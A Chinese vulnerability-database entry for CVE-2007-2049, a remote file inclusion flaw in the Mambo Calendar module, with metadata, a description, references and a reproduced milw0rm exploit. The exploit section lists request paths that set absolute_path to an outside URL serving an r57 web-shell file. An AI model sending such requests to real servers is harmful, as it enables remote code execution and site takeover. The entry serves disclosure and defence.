Mambo 日历模块绝对路径多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112684 漏洞类型 输入验证
发布时间 2007-04-11 更新时间 2007-04-18
CVE编号 CVE-2007-2049 CNNVD-ID CNNVD-200704-263
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3713
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-263
|漏洞详情
MamboCalendar模块(com_calendar)存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)com_calendar.php或(2)mod_calendar.php的absolute_path参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
==================================================================
Mambo module Calendar (Agenda) <= 155 (com_calendar.php) Multiple RFI Vuln
==================================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================================
Homepage: www.Hack-Teach.com
==================================================================
Script :
http://www2.tutorial.hu/letoltes/dl.php?p=/scriptek/joomla/mambo.4.0.x/Calendar&i=agenda-155.zip
==================================================================
File : /com_calendar.php
include($absolute_path.'/components/calendar/cal_config.php');
==================================================================
/components/calendar/com_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/calendar/mod_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
Or
/components/com_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/mod_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================================


#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-11]
|参考资料

来源:BID
名称:23435
链接:http://www.securityfocus.com/bid/23435
来源:MILW0RM
名称:3713
链接:http://www.milw0rm.com/exploits/3713
来源:OSVDB
名称:37584
链接:http://osvdb.org/37584
来源:OSVDB
名称:37583
链接:http://osvdb.org/37583